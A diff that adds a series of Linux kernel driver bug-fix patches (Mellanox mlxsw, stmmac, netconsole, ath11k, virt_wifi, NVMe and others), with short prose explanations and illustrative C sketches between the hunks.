+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.h b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.h
+index c5bcc8d7481ca..ac6dcab454b49 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.h
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.h
+@@ -29,6 +29,7 @@ struct ice_vf_fdir_ctx {
+ struct ice_vf_fdir {
+ 	u16 fdir_fltr_cnt[ICE_FLTR_PTYPE_MAX][ICE_FD_HW_SEG_MAX];
+ 	int prof_entry_cnt[ICE_FLTR_PTYPE_MAX][ICE_FD_HW_SEG_MAX];
++	u16 fdir_fltr_cnt_total;
+ 	struct ice_fd_hw_prof **fdir_prof;
+ 
+ 	struct idr fdir_rule_idr;
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_atcam.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_atcam.c
+index 4b713832fdd55..f5c0a4214c4e5 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_atcam.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_atcam.c
+@@ -391,7 +391,8 @@ mlxsw_sp_acl_atcam_region_entry_insert(struct mlxsw_sp *mlxsw_sp,
+ 	if (err)
+ 		return err;
+ 
+-	lkey_id = aregion->ops->lkey_id_get(aregion, aentry->enc_key, erp_id);
++	lkey_id = aregion->ops->lkey_id_get(aregion, aentry->ht_key.enc_key,
++					    erp_id);
+ 	if (IS_ERR(lkey_id))
+ 		return PTR_ERR(lkey_id);
+ 	aentry->lkey_id = lkey_id;
+@@ -399,7 +400,7 @@ mlxsw_sp_acl_atcam_region_entry_insert(struct mlxsw_sp *mlxsw_sp,
+ 	kvdl_index = mlxsw_afa_block_first_kvdl_index(rulei->act_block);
+ 	mlxsw_reg_ptce3_pack(ptce3_pl, true, MLXSW_REG_PTCE3_OP_WRITE_WRITE,
+ 			     priority, region->tcam_region_info,
+-			     aentry->enc_key, erp_id,
++			     aentry->ht_key.enc_key, erp_id,
+ 			     aentry->delta_info.start,
+ 			     aentry->delta_info.mask,
+ 			     aentry->delta_info.value,
+@@ -428,7 +429,7 @@ mlxsw_sp_acl_atcam_region_entry_remove(struct mlxsw_sp *mlxsw_sp,
+ 
+ 	mlxsw_reg_ptce3_pack(ptce3_pl, false, MLXSW_REG_PTCE3_OP_WRITE_WRITE, 0,
+ 			     region->tcam_region_info,
+-			     aentry->enc_key, erp_id,
++			     aentry->ht_key.enc_key, erp_id,
+ 			     aentry->delta_info.start,
+ 			     aentry->delta_info.mask,
+ 			     aentry->delta_info.value,
+@@ -457,7 +458,7 @@ mlxsw_sp_acl_atcam_region_entry_action_replace(struct mlxsw_sp *mlxsw_sp,
+ 	kvdl_index = mlxsw_afa_block_first_kvdl_index(rulei->act_block);
+ 	mlxsw_reg_ptce3_pack(ptce3_pl, true, MLXSW_REG_PTCE3_OP_WRITE_UPDATE,
+ 			     priority, region->tcam_region_info,
+-			     aentry->enc_key, erp_id,
++			     aentry->ht_key.enc_key, erp_id,
+ 			     aentry->delta_info.start,
+ 			     aentry->delta_info.mask,
+ 			     aentry->delta_info.value,
+@@ -480,15 +481,13 @@ __mlxsw_sp_acl_atcam_entry_add(struct mlxsw_sp *mlxsw_sp,
+ 	int err;
+ 
+ 	mlxsw_afk_encode(afk, region->key_info, &rulei->values,
+-			 aentry->ht_key.full_enc_key, mask);
++			 aentry->ht_key.enc_key, mask);
+ 
+ 	erp_mask = mlxsw_sp_acl_erp_mask_get(aregion, mask, false);
+ 	if (IS_ERR(erp_mask))
+ 		return PTR_ERR(erp_mask);
+ 	aentry->erp_mask = erp_mask;
+ 	aentry->ht_key.erp_id = mlxsw_sp_acl_erp_mask_erp_id(erp_mask);
+-	memcpy(aentry->enc_key, aentry->ht_key.full_enc_key,
+-	       sizeof(aentry->enc_key));
+ 
+ 	/* Compute all needed delta information and clear the delta bits
+ 	 * from the encrypted key.
+@@ -497,9 +496,8 @@ __mlxsw_sp_acl_atcam_entry_add(struct mlxsw_sp *mlxsw_sp,
+ 	aentry->delta_info.start = mlxsw_sp_acl_erp_delta_start(delta);
+ 	aentry->delta_info.mask = mlxsw_sp_acl_erp_delta_mask(delta);
+ 	aentry->delta_info.value =
+-		mlxsw_sp_acl_erp_delta_value(delta,
+-					     aentry->ht_key.full_enc_key);
+-	mlxsw_sp_acl_erp_delta_clear(delta, aentry->enc_key);
++		mlxsw_sp_acl_erp_delta_value(delta, aentry->ht_key.enc_key);
++	mlxsw_sp_acl_erp_delta_clear(delta, aentry->ht_key.enc_key);
+ 
+ 	/* Add rule to the list of A-TCAM rules, assuming this
+ 	 * rule is intended to A-TCAM. In case this rule does
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_bloom_filter.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_bloom_filter.c
+index 95f63fcf4ba1f..a54eedb69a3f5 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_bloom_filter.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_bloom_filter.c
+@@ -249,7 +249,7 @@ __mlxsw_sp_acl_bf_key_encode(struct mlxsw_sp_acl_atcam_region *aregion,
+ 		memcpy(chunk + pad_bytes, &erp_region_id,
+ 		       sizeof(erp_region_id));
+ 		memcpy(chunk + key_offset,
+-		       &aentry->enc_key[chunk_key_offsets[chunk_index]],
++		       &aentry->ht_key.enc_key[chunk_key_offsets[chunk_index]],
+ 		       chunk_key_len);
+ 		chunk += chunk_len;
+ 	}
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c
+index d231f4d2888be..9eee229303cce 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c
+@@ -1217,18 +1217,6 @@ static bool mlxsw_sp_acl_erp_delta_check(void *priv, const void *parent_obj,
+ 	return err ? false : true;
+ }
+ 
+-static int mlxsw_sp_acl_erp_hints_obj_cmp(const void *obj1, const void *obj2)
+-{
+-	const struct mlxsw_sp_acl_erp_key *key1 = obj1;
+-	const struct mlxsw_sp_acl_erp_key *key2 = obj2;
+-
+-	/* For hints purposes, two objects are considered equal
+-	 * in case the masks are the same. Does not matter what
+-	 * the "ctcam" value is.
+-	 */
+-	return memcmp(key1->mask, key2->mask, sizeof(key1->mask));
+-}
+-
+ static void *mlxsw_sp_acl_erp_delta_create(void *priv, void *parent_obj,
+ 					   void *obj)
+ {
+@@ -1308,7 +1296,6 @@ static void mlxsw_sp_acl_erp_root_destroy(void *priv, void *root_priv)
+ static const struct objagg_ops mlxsw_sp_acl_erp_objagg_ops = {
+ 	.obj_size = sizeof(struct mlxsw_sp_acl_erp_key),
+ 	.delta_check = mlxsw_sp_acl_erp_delta_check,
+-	.hints_obj_cmp = mlxsw_sp_acl_erp_hints_obj_cmp,
+ 	.delta_create = mlxsw_sp_acl_erp_delta_create,
+ 	.delta_destroy = mlxsw_sp_acl_erp_delta_destroy,
+ 	.root_create = mlxsw_sp_acl_erp_root_create,
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.h b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.h
+index edbbc89e7a719..24ba15d8b4168 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.h
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.h
+@@ -171,9 +171,9 @@ struct mlxsw_sp_acl_atcam_region {
+ };
+ 
+ struct mlxsw_sp_acl_atcam_entry_ht_key {
+-	char full_enc_key[MLXSW_REG_PTCEX_FLEX_KEY_BLOCKS_LEN]; /* Encoded
+-								 * key.
+-								 */
++	char enc_key[MLXSW_REG_PTCEX_FLEX_KEY_BLOCKS_LEN]; /* Encoded key, minus
++							    * delta bits.
++							    */
+ 	u8 erp_id;
+ };
+ 
+@@ -185,9 +185,6 @@ struct mlxsw_sp_acl_atcam_entry {
+ 	struct rhash_head ht_node;
+ 	struct list_head list; /* Member in entries_list */
+ 	struct mlxsw_sp_acl_atcam_entry_ht_key ht_key;
+-	char enc_key[MLXSW_REG_PTCEX_FLEX_KEY_BLOCKS_LEN]; /* Encoded key,
+-							    * minus delta bits.
+-							    */
+ 	struct {
+ 		u16 start;
+ 		u8 mask;
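
Taken together, the mlxsw hunks above collapse the two copies of the encoded key into a single canonical one: the rhashtable key now holds the delta-cleared key that is also programmed to hardware, so lookup and register programming can no longer disagree. A minimal layout sketch of the change (names and the size are illustrative, not the real driver structures):

#include <stdio.h>

#define KEY_LEN 96	/* stands in for MLXSW_REG_PTCEX_FLEX_KEY_BLOCKS_LEN */

/* Before: two key copies that can drift apart. */
struct entry_old {
	struct {
		char full_enc_key[KEY_LEN];	/* hashed/compared by the rhashtable */
		unsigned char erp_id;
	} ht_key;
	char enc_key[KEY_LEN];			/* delta bits cleared, programmed to hw */
};

/* After: one canonical copy; delta bits are cleared in place before insert. */
struct entry_new {
	struct {
		char enc_key[KEY_LEN];		/* encoded key, minus delta bits */
		unsigned char erp_id;
	} ht_key;
};

int main(void)
{
	printf("old %zu bytes, new %zu bytes per entry\n",
	       sizeof(struct entry_old), sizeof(struct entry_new));
	return 0;
}
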
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+index 39112d5cb5b80..687eb17e41c6e 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac4_core.c
+@@ -971,7 +971,7 @@ static void dwmac4_set_mac_loopback(void __iomem *ioaddr, bool enable)
+ }
+ 
+ static void dwmac4_update_vlan_hash(struct mac_device_info *hw, u32 hash,
+-				    __le16 perfect_match, bool is_double)
++				    u16 perfect_match, bool is_double)
+ {
+ 	void __iomem *ioaddr = hw->pcsr;
+ 	u32 value;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+index dd73f38ec08d8..813327d04c56f 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwxgmac2_core.c
+@@ -582,7 +582,7 @@ static int dwxgmac2_rss_configure(struct mac_device_info *hw,
+ }
+ 
+ static void dwxgmac2_update_vlan_hash(struct mac_device_info *hw, u32 hash,
+-				      __le16 perfect_match, bool is_double)
++				      u16 perfect_match, bool is_double)
+ {
+ 	void __iomem *ioaddr = hw->pcsr;
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/hwif.h b/drivers/net/ethernet/stmicro/stmmac/hwif.h
+index b2b9cf04bc726..820e2251b7c88 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/hwif.h
++++ b/drivers/net/ethernet/stmicro/stmmac/hwif.h
+@@ -366,7 +366,7 @@ struct stmmac_ops {
+ 			     struct stmmac_rss *cfg, u32 num_rxq);
+ 	/* VLAN */
+ 	void (*update_vlan_hash)(struct mac_device_info *hw, u32 hash,
+-				 __le16 perfect_match, bool is_double);
++				 u16 perfect_match, bool is_double);
+ 	void (*enable_vlan)(struct mac_device_info *hw, u32 type);
+ 	int (*add_hw_vlan_rx_fltr)(struct net_device *dev,
+ 				   struct mac_device_info *hw,
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index e2d51014ab4bc..93630840309e7 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -6311,7 +6311,7 @@ static u32 stmmac_vid_crc32_le(__le16 vid_le)
+ static int stmmac_vlan_update(struct stmmac_priv *priv, bool is_double)
+ {
+ 	u32 crc, hash = 0;
+-	__le16 pmatch = 0;
++	u16 pmatch = 0;
+ 	int count = 0;
+ 	u16 vid = 0;
+ 
+@@ -6326,7 +6326,7 @@ static int stmmac_vlan_update(struct stmmac_priv *priv, bool is_double)
+ 		if (count > 2) /* VID = 0 always passes filter */
+ 			return -EOPNOTSUPP;
+ 
+-		pmatch = cpu_to_le16(vid);
++		pmatch = vid;
+ 		hash = 0;
+ 	}
+ 
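
The stmmac change drops the __le16 annotation from the perfect-match VID and passes it through the update_vlan_hash() callbacks in CPU byte order. If a particular MAC really does want a fixed byte order, the conversion belongs at the single point where the value hits a register, not in the callers; a hedged userspace sketch of that boundary (reg_write() is a stand-in, not a real API):

#include <endian.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical register write standing in for writel(); illustrative only. */
static void reg_write(uint32_t *reg, uint32_t val)
{
	*reg = val;
}

/* The internal API carries a host-order VID; convert once at the
 * hardware boundary if and only if the device requires it. */
static void set_vlan_perfect_match(uint32_t *reg, uint16_t vid)
{
	reg_write(reg, htole16(vid));
}

int main(void)
{
	uint32_t fake_reg = 0;

	set_vlan_perfect_match(&fake_reg, 100);
	printf("reg = 0x%08x\n", fake_reg);
	return 0;
}
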
+diff --git a/drivers/net/netconsole.c b/drivers/net/netconsole.c
+index bdff9ac5056dd..1e797f1ddc31c 100644
+--- a/drivers/net/netconsole.c
++++ b/drivers/net/netconsole.c
+@@ -716,6 +716,7 @@ static int netconsole_netdev_event(struct notifier_block *this,
+ 				/* rtnl_lock already held
+ 				 * we might sleep in __netpoll_cleanup()
+ 				 */
++				nt->enabled = false;
+ 				spin_unlock_irqrestore(&target_list_lock, flags);
+ 
+ 				__netpoll_cleanup(&nt->np);
+@@ -723,7 +724,6 @@ static int netconsole_netdev_event(struct notifier_block *this,
+ 				spin_lock_irqsave(&target_list_lock, flags);
+ 				netdev_put(nt->np.dev, &nt->np.dev_tracker);
+ 				nt->np.dev = NULL;
+-				nt->enabled = false;
+ 				stopped = true;
+ 				netconsole_target_put(nt);
+ 				goto restart;
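
The netconsole hunk is purely an ordering fix: nt->enabled is cleared while target_list_lock is still held, so no other context can pick the target up between the unlock and the netpoll teardown. The same publish-then-teardown shape, sketched with pthreads:

#include <pthread.h>
#include <stdbool.h>

struct target {
	bool enabled;
	/* ... resources torn down outside the lock ... */
};

static pthread_mutex_t list_lock = PTHREAD_MUTEX_INITIALIZER;

/* Mark the target unusable while still holding the lock, then do the
 * sleepy cleanup outside it, mirroring the netconsole ordering. */
static void disable_target(struct target *t)
{
	pthread_mutex_lock(&list_lock);
	t->enabled = false;		/* readers under list_lock now skip t */
	pthread_mutex_unlock(&list_lock);

	/* slow teardown here, safe because t is already unreachable */
}

int main(void)
{
	struct target t = { .enabled = true };

	disable_target(&t);
	return t.enabled;	/* 0: the flag flipped before teardown */
}
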
+diff --git a/drivers/net/wireless/ath/ath11k/dp_rx.c b/drivers/net/wireless/ath/ath11k/dp_rx.c
+index b1067bcdf88a5..3746f9c956969 100644
+--- a/drivers/net/wireless/ath/ath11k/dp_rx.c
++++ b/drivers/net/wireless/ath/ath11k/dp_rx.c
+@@ -1879,8 +1879,7 @@ static void ath11k_dp_rx_h_csum_offload(struct ath11k *ar, struct sk_buff *msdu)
+ 			  CHECKSUM_NONE : CHECKSUM_UNNECESSARY;
+ }
+ 
+-static int ath11k_dp_rx_crypto_mic_len(struct ath11k *ar,
+-				       enum hal_encrypt_type enctype)
++int ath11k_dp_rx_crypto_mic_len(struct ath11k *ar, enum hal_encrypt_type enctype)
+ {
+ 	switch (enctype) {
+ 	case HAL_ENCRYPT_TYPE_OPEN:
+diff --git a/drivers/net/wireless/ath/ath11k/dp_rx.h b/drivers/net/wireless/ath/ath11k/dp_rx.h
+index 623da3bf9dc81..c322e30caa968 100644
+--- a/drivers/net/wireless/ath/ath11k/dp_rx.h
++++ b/drivers/net/wireless/ath/ath11k/dp_rx.h
+@@ -1,6 +1,7 @@
+ /* SPDX-License-Identifier: BSD-3-Clause-Clear */
+ /*
+  * Copyright (c) 2018-2019 The Linux Foundation. All rights reserved.
++ * Copyright (c) 2024 Qualcomm Innovation Center, Inc. All rights reserved.
+  */
+ #ifndef ATH11K_DP_RX_H
+ #define ATH11K_DP_RX_H
+@@ -95,4 +96,6 @@ int ath11k_peer_rx_frag_setup(struct ath11k *ar, const u8 *peer_mac, int vdev_id
+ int ath11k_dp_rx_pktlog_start(struct ath11k_base *ab);
+ int ath11k_dp_rx_pktlog_stop(struct ath11k_base *ab, bool stop_timer);
+ 
++int ath11k_dp_rx_crypto_mic_len(struct ath11k *ar, enum hal_encrypt_type enctype);
++
+ #endif /* ATH11K_DP_RX_H */
+diff --git a/drivers/net/wireless/ath/ath11k/mac.c b/drivers/net/wireless/ath/ath11k/mac.c
+index b863ead198bda..8234e34269ed8 100644
+--- a/drivers/net/wireless/ath/ath11k/mac.c
++++ b/drivers/net/wireless/ath/ath11k/mac.c
+@@ -3748,6 +3748,7 @@ static int ath11k_install_key(struct ath11k_vif *arvif,
+ 
+ 	switch (key->cipher) {
+ 	case WLAN_CIPHER_SUITE_CCMP:
++	case WLAN_CIPHER_SUITE_CCMP_256:
+ 		arg.key_cipher = WMI_CIPHER_AES_CCM;
+ 		/* TODO: Re-check if flag is valid */
+ 		key->flags |= IEEE80211_KEY_FLAG_GENERATE_IV_MGMT;
+@@ -3757,12 +3758,10 @@ static int ath11k_install_key(struct ath11k_vif *arvif,
+ 		arg.key_txmic_len = 8;
+ 		arg.key_rxmic_len = 8;
+ 		break;
+-	case WLAN_CIPHER_SUITE_CCMP_256:
+-		arg.key_cipher = WMI_CIPHER_AES_CCM;
+-		break;
+ 	case WLAN_CIPHER_SUITE_GCMP:
+ 	case WLAN_CIPHER_SUITE_GCMP_256:
+ 		arg.key_cipher = WMI_CIPHER_AES_GCM;
++		key->flags |= IEEE80211_KEY_FLAG_GENERATE_IV_MGMT;
+ 		break;
+ 	default:
+ 		ath11k_warn(ar->ab, "cipher %d is not supported\n", key->cipher);
+@@ -5542,7 +5541,10 @@ static int ath11k_mac_mgmt_tx_wmi(struct ath11k *ar, struct ath11k_vif *arvif,
+ {
+ 	struct ath11k_base *ab = ar->ab;
+ 	struct ieee80211_hdr *hdr = (struct ieee80211_hdr *)skb->data;
++	struct ath11k_skb_cb *skb_cb = ATH11K_SKB_CB(skb);
+ 	struct ieee80211_tx_info *info;
++	enum hal_encrypt_type enctype;
++	unsigned int mic_len;
+ 	dma_addr_t paddr;
+ 	int buf_id;
+ 	int ret;
+@@ -5566,7 +5568,12 @@ static int ath11k_mac_mgmt_tx_wmi(struct ath11k *ar, struct ath11k_vif *arvif,
+ 		     ieee80211_is_deauth(hdr->frame_control) ||
+ 		     ieee80211_is_disassoc(hdr->frame_control)) &&
+ 		     ieee80211_has_protected(hdr->frame_control)) {
+-			skb_put(skb, IEEE80211_CCMP_MIC_LEN);
++			if (!(skb_cb->flags & ATH11K_SKB_CIPHER_SET))
++				ath11k_warn(ab, "WMI management tx frame without ATH11K_SKB_CIPHER_SET");
++
++			enctype = ath11k_dp_tx_get_encrypt_type(skb_cb->cipher);
++			mic_len = ath11k_dp_rx_crypto_mic_len(ar, enctype);
++			skb_put(skb, mic_len);
+ 		}
+ 	}
+ 
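
Instead of always reserving IEEE80211_CCMP_MIC_LEN (8 bytes) of tailroom for protected deauth/disassoc frames, the tx path now asks for the MIC length of the cipher actually in use, which matters for CCMP-256 and GCMP whose MIC is 16 bytes. A sketch of the mapping (enum names here are illustrative; the real helper is the ath11k_dp_rx_crypto_mic_len() exported above, and the lengths follow the 802.11 cipher definitions):

#include <stdio.h>

enum enctype { ENC_OPEN, ENC_TKIP, ENC_CCMP_128, ENC_CCMP_256,
	       ENC_GCMP_128, ENC_GCMP_256 };

static unsigned int crypto_mic_len(enum enctype t)
{
	switch (t) {
	case ENC_OPEN:
		return 0;
	case ENC_TKIP:
	case ENC_CCMP_128:
		return 8;	/* IEEE80211_CCMP_MIC_LEN */
	case ENC_CCMP_256:
	case ENC_GCMP_128:
	case ENC_GCMP_256:
		return 16;	/* twice the CCMP-128 MIC */
	}
	return 0;
}

int main(void)
{
	printf("CCMP-128: %u, GCMP-256: %u\n",
	       crypto_mic_len(ENC_CCMP_128), crypto_mic_len(ENC_GCMP_256));
	return 0;
}
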
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy/phy_lcn.c b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy/phy_lcn.c
+index 7717eb85a1db6..47c0e8e429e54 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy/phy_lcn.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy/phy_lcn.c
+@@ -2567,7 +2567,6 @@ wlc_lcnphy_tx_iqlo_cal(struct brcms_phy *pi,
+ 
+ 	struct lcnphy_txgains cal_gains, temp_gains;
+ 	u16 hash;
+-	u8 band_idx;
+ 	int j;
+ 	u16 ncorr_override[5];
+ 	u16 syst_coeffs[] = { 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
+@@ -2599,6 +2598,9 @@ wlc_lcnphy_tx_iqlo_cal(struct brcms_phy *pi,
+ 	u16 *values_to_save;
+ 	struct brcms_phy_lcnphy *pi_lcn = pi->u.pi_lcnphy;
+ 
++	if (WARN_ON(CHSPEC_IS5G(pi->radio_chanspec)))
++		return;
++
+ 	values_to_save = kmalloc_array(20, sizeof(u16), GFP_ATOMIC);
+ 	if (NULL == values_to_save)
+ 		return;
+@@ -2662,20 +2664,18 @@ wlc_lcnphy_tx_iqlo_cal(struct brcms_phy *pi,
+ 	hash = (target_gains->gm_gain << 8) |
+ 	       (target_gains->pga_gain << 4) | (target_gains->pad_gain);
+ 
+-	band_idx = (CHSPEC_IS5G(pi->radio_chanspec) ? 1 : 0);
+-
+ 	cal_gains = *target_gains;
+ 	memset(ncorr_override, 0, sizeof(ncorr_override));
+-	for (j = 0; j < iqcal_gainparams_numgains_lcnphy[band_idx]; j++) {
+-		if (hash == tbl_iqcal_gainparams_lcnphy[band_idx][j][0]) {
++	for (j = 0; j < iqcal_gainparams_numgains_lcnphy[0]; j++) {
++		if (hash == tbl_iqcal_gainparams_lcnphy[0][j][0]) {
+ 			cal_gains.gm_gain =
+-				tbl_iqcal_gainparams_lcnphy[band_idx][j][1];
++				tbl_iqcal_gainparams_lcnphy[0][j][1];
+ 			cal_gains.pga_gain =
+-				tbl_iqcal_gainparams_lcnphy[band_idx][j][2];
++				tbl_iqcal_gainparams_lcnphy[0][j][2];
+ 			cal_gains.pad_gain =
+-				tbl_iqcal_gainparams_lcnphy[band_idx][j][3];
++				tbl_iqcal_gainparams_lcnphy[0][j][3];
+ 			memcpy(ncorr_override,
+-			       &tbl_iqcal_gainparams_lcnphy[band_idx][j][3],
++			       &tbl_iqcal_gainparams_lcnphy[0][j][3],
+ 			       sizeof(ncorr_override));
+ 			break;
+ 		}
+diff --git a/drivers/net/wireless/marvell/mwifiex/cfg80211.c b/drivers/net/wireless/marvell/mwifiex/cfg80211.c
+index c907da2a4789a..d1b23dba5ad50 100644
+--- a/drivers/net/wireless/marvell/mwifiex/cfg80211.c
++++ b/drivers/net/wireless/marvell/mwifiex/cfg80211.c
+@@ -926,6 +926,8 @@ mwifiex_init_new_priv_params(struct mwifiex_private *priv,
+ 		return -EOPNOTSUPP;
+ 	}
+ 
++	priv->bss_num = mwifiex_get_unused_bss_num(adapter, priv->bss_type);
++
+ 	spin_lock_irqsave(&adapter->main_proc_lock, flags);
+ 	adapter->main_locked = false;
+ 	spin_unlock_irqrestore(&adapter->main_proc_lock, flags);
+diff --git a/drivers/net/wireless/realtek/rtw89/debug.c b/drivers/net/wireless/realtek/rtw89/debug.c
+index 3a8fe60d0bb7b..0e014d6afb842 100644
+--- a/drivers/net/wireless/realtek/rtw89/debug.c
++++ b/drivers/net/wireless/realtek/rtw89/debug.c
+@@ -2386,7 +2386,7 @@ static void rtw89_sta_info_get_iter(void *data, struct ieee80211_sta *sta)
+ 	case RX_ENC_HE:
+ 		seq_printf(m, "HE %dSS MCS-%d GI:%s", status->nss, status->rate_idx,
+ 			   status->he_gi <= NL80211_RATE_INFO_HE_GI_3_2 ?
+-			   he_gi_str[rate->he_gi] : "N/A");
++			   he_gi_str[status->he_gi] : "N/A");
+ 		break;
+ 	}
+ 	seq_printf(m, "\t(hw_rate=0x%x)\n", rtwsta->rx_hw_rate);
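
The rtw89 one-liner fixes a classic mismatch: the bounds check tested status->he_gi while the array index used rate->he_gi. Check and index must use the same variable, as in this reduced form (array contents illustrative):

#include <stdio.h>

static const char * const he_gi_str[] = { "0.8", "1.6", "3.2" };

/* Check and index with the same variable, or the check proves nothing. */
static const char *gi_name(unsigned int gi)
{
	return gi < sizeof(he_gi_str) / sizeof(he_gi_str[0])
		? he_gi_str[gi] : "N/A";
}

int main(void)
{
	printf("%s %s\n", gi_name(1), gi_name(7));
	return 0;
}
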
+diff --git a/drivers/net/wireless/virt_wifi.c b/drivers/net/wireless/virt_wifi.c
+index ba14d83353a4b..fb4d95a027fef 100644
+--- a/drivers/net/wireless/virt_wifi.c
++++ b/drivers/net/wireless/virt_wifi.c
+@@ -136,6 +136,9 @@ static struct ieee80211_supported_band band_5ghz = {
+ /* Assigned at module init. Guaranteed locally-administered and unicast. */
+ static u8 fake_router_bssid[ETH_ALEN] __ro_after_init = {};
+ 
++#define VIRT_WIFI_SSID "VirtWifi"
++#define VIRT_WIFI_SSID_LEN 8
++
+ static void virt_wifi_inform_bss(struct wiphy *wiphy)
+ {
+ 	u64 tsf = div_u64(ktime_get_boottime_ns(), 1000);
+@@ -146,8 +149,8 @@ static void virt_wifi_inform_bss(struct wiphy *wiphy)
+ 		u8 ssid[8];
+ 	} __packed ssid = {
+ 		.tag = WLAN_EID_SSID,
+-		.len = 8,
+-		.ssid = "VirtWifi",
++		.len = VIRT_WIFI_SSID_LEN,
++		.ssid = VIRT_WIFI_SSID,
+ 	};
+ 
+ 	informed_bss = cfg80211_inform_bss(wiphy, &channel_5ghz,
+@@ -213,6 +216,8 @@ struct virt_wifi_netdev_priv {
+ 	struct net_device *upperdev;
+ 	u32 tx_packets;
+ 	u32 tx_failed;
++	u32 connect_requested_ssid_len;
++	u8 connect_requested_ssid[IEEE80211_MAX_SSID_LEN];
+ 	u8 connect_requested_bss[ETH_ALEN];
+ 	bool is_up;
+ 	bool is_connected;
+@@ -229,6 +234,12 @@ static int virt_wifi_connect(struct wiphy *wiphy, struct net_device *netdev,
+ 	if (priv->being_deleted || !priv->is_up)
+ 		return -EBUSY;
+ 
++	if (!sme->ssid)
++		return -EINVAL;
++
++	priv->connect_requested_ssid_len = sme->ssid_len;
++	memcpy(priv->connect_requested_ssid, sme->ssid, sme->ssid_len);
++
+ 	could_schedule = schedule_delayed_work(&priv->connect, HZ * 2);
+ 	if (!could_schedule)
+ 		return -EBUSY;
+@@ -252,12 +263,15 @@ static void virt_wifi_connect_complete(struct work_struct *work)
+ 		container_of(work, struct virt_wifi_netdev_priv, connect.work);
+ 	u8 *requested_bss = priv->connect_requested_bss;
+ 	bool right_addr = ether_addr_equal(requested_bss, fake_router_bssid);
++	bool right_ssid = priv->connect_requested_ssid_len == VIRT_WIFI_SSID_LEN &&
++			  !memcmp(priv->connect_requested_ssid, VIRT_WIFI_SSID,
++				  priv->connect_requested_ssid_len);
+ 	u16 status = WLAN_STATUS_SUCCESS;
+ 
+ 	if (is_zero_ether_addr(requested_bss))
+ 		requested_bss = NULL;
+ 
+-	if (!priv->is_up || (requested_bss && !right_addr))
++	if (!priv->is_up || (requested_bss && !right_addr) || !right_ssid)
+ 		status = WLAN_STATUS_UNSPECIFIED_FAILURE;
+ 	else
+ 		priv->is_connected = true;
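
virt_wifi now records the SSID passed to connect, and the completion handler fails anything that does not match the advertised "VirtWifi" in both length and content. The comparison, as a standalone sketch:

#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define VIRT_WIFI_SSID		"VirtWifi"
#define VIRT_WIFI_SSID_LEN	8

/* Match length and content; memcmp alone would accept a prefix of a
 * longer requested SSID. */
static bool ssid_matches(const unsigned char *ssid, size_t len)
{
	return len == VIRT_WIFI_SSID_LEN &&
	       memcmp(ssid, VIRT_WIFI_SSID, VIRT_WIFI_SSID_LEN) == 0;
}

int main(void)
{
	printf("%d %d\n",
	       ssid_matches((const unsigned char *)"VirtWifi", 8),
	       ssid_matches((const unsigned char *)"VirtWifi2", 9));
	return 0;
}
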
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index 32e89ea853a47..27446fa847526 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -910,7 +910,8 @@ static blk_status_t nvme_prep_rq(struct nvme_dev *dev, struct request *req)
+ 	blk_mq_start_request(req);
+ 	return BLK_STS_OK;
+ out_unmap_data:
+-	nvme_unmap_data(dev, req);
++	if (blk_rq_nr_phys_segments(req))
++		nvme_unmap_data(dev, req);
+ out_free_cmd:
+ 	nvme_cleanup_cmd(req);
+ 	return ret;
+@@ -1322,7 +1323,7 @@ static void nvme_warn_reset(struct nvme_dev *dev, u32 csts)
+ 	dev_warn(dev->ctrl.device,
+ 		 "Does your device have a faulty power saving mode enabled?\n");
+ 	dev_warn(dev->ctrl.device,
+-		 "Try \"nvme_core.default_ps_max_latency_us=0 pcie_aspm=off\" and report a bug\n");
++		 "Try \"nvme_core.default_ps_max_latency_us=0 pcie_aspm=off pcie_port_pm=off\" and report a bug\n");
+ }
+ 
+ static enum blk_eh_timer_return nvme_timeout(struct request *req)
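
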